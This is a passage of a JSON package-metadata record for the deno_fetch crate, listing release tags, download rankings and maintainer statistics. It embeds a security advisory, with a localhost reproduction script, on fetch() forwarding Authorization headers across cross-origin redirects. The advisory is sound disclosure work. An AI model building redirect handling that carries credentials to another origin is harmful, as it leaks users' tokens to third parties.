rl":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-02T23:59:39.956Z","dependent_packages_count":19,"downloads":850613,"downloads_period":"total","dependent_repos_count":43,"rankings":{"downloads":4.737023083363234,"dependent_repos_count":4.480793394363669,"dependent_packages_count":2.11521488728328,"stargazers_count":0.002243493867783428,"forks_count":0.05758300927310799,"docker_downloads_count":0.9807439301518956,"average":2.0622669663838287},"purl":"pkg:cargo/deno_fetch","advisories":[{"uuid":"GSA_kwCzR0hTQS1mMjdwLWNtdjgteGhtNs4ABC_L","url":"https://github.com/advisories/GHSA-f27p-cmv8-xhm6","title":"fetch: Authorization headers not dropped when redirecting cross-origin","description":"### Summary\nWhen you send a request with the `Authorization` header to one domain, and the response asks to redirect to a different domain, Deno's`fetch()` redirect handling creates a follow-up redirect request that keeps the original `Authorization` header, leaking its content to that second domain.\n\n\n### Details\n\nThe [right behavior](https://fetch.spec.whatwg.org/#ref-for-cors-non-wildcard-request-header-name) would be to drop the `Authorization` header instead, in this scenario. The same is generally applied to `Cookie` and `Proxy-Authorization` headers, and is done for not only host changes, but also protocol/port changes. Generally referred to as \"origin\".\n\nThe [documentation](https://docs.deno.com/runtime/reference/web_platform_apis/#:~:text=Deno%20does%20not%20follow%20the,leaking%20authenticated%20data%20cross%20origin.) states: \n\u003e Deno does not follow the same-origin policy, because the Deno user agent currently does not have the concept of origins, and it does not have a cookie jar. This means Deno **does not need** to protect against leaking authenticated data cross origin \n\n### Reproduction\n```ts\nconst ac = new AbortController()\n\nconst server1 = Deno.serve({ port: 3001, signal: ac.signal }, (req) =\u003e {\n  return new Response(null, {\n    status: 302,\n    headers: {\n      'location': 'http://localhost:3002/redirected'\n    },\n  })\n})\n\nconst server2 = Deno.serve({ port: 3002, signal: ac.signal }, (req) =\u003e {\n  const body = JSON.stringify({\n    url: req.url,\n    hasAuth: req.headers.has('authorization'),\n  })\n  return new Response(body, {\n    status: 200,\n    headers: {'content-type': 'application/json'},\n  })\n})\n\nasync function main() {\n  const response = await fetch(\"http://localhost:3001/\", {\n    headers: {authorization: 'Bearer foo'}\n  })\n  const body = await response.json()\n  \n  ac.abort()\n  \n  if (body.hasAuth) {\n    console.error('ERROR: Authorization header should not be present after cross-origin redirect')\n  } else {\n    console.log('SUCCESS: Authorization header is not present after cross-origin redirect')\n  }\n}\n\nsetTimeout(main, 500)\n```\n","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-01-06T22:27:09.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-f27p-cmv8-xhm6","https://nvd.nist.gov/vuln/detail/CVE-2025-21620","https://github.com/advisories/GHSA-f27p-cmv8-xhm6"],"source_kind":"github","identifiers":["GHSA-f27p-cmv8-xhm6","CVE-2025-21620"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2025-01-06T23:08:01.132Z","updated_at":"2026-09-03T07:06:48.496Z","epss_percentage":0.00514,"epss_percentile":0.4159,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mMjdwLWNtdjgteGhtNs4ABC_L","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1mMjdwLWNtdjgteGhtNs4ABC_L","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.1.2","vulnerable_version_range":"\u003e= 2.0.0, \u003c 2.1.2"},{"first_patched_version":null,"vulnerable_version_range":"\u003c= 1.46.3"}],"purl":"pkg:cargo/deno"},{"ecosystem":"cargo","package_name":"deno_fetch","versions":[{"first_patched_version":"0.204.0","vulnerable_version_range":"\u003e= 0.0.1, \u003c 0.204.0"}],"purl":"pkg:cargo/deno_fetch"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mMjdwLWNtdjgteGhtNs4ABC_L/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_fetch","docker_dependents_count":19,"docker_downloads_count":18696296,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_fetch","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_fetch/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-02T15:37:31.804Z","issues_count":6649,"pull_requests_count":9665,"avg_time_to_close_issue":17142321.817895565,"avg_time_to_close_pull_request":1531000.8875776397,"issues_closed_count":3809,"pull_requests_closed_count":8049,"pull_request_authors_count":587,"issue_authors_count":2488,"avg_comments_per_issue":2.5045871559633026,"avg_comments_per_pull_request":0.7203310915675116,"merged_pull_requests_count":7028,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":678,"past_year_pull_requests_count":1200,"past_year_avg_time_to_close_issue":1402061.7489361702,"past_year_avg_time_to_close_pull_request":1295976.3677130046,"past_year_issues_closed_count":235,"past_year_pull_requests_closed_count":669,"past_year_pull_request_authors_count":189,"past_year_issue_authors_count":376,"past_year_avg_comments_per_issue":1.2227138643067847,"past_year_avg_comments_per_pull_request":1.1233333333333333,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":501,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":397,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"}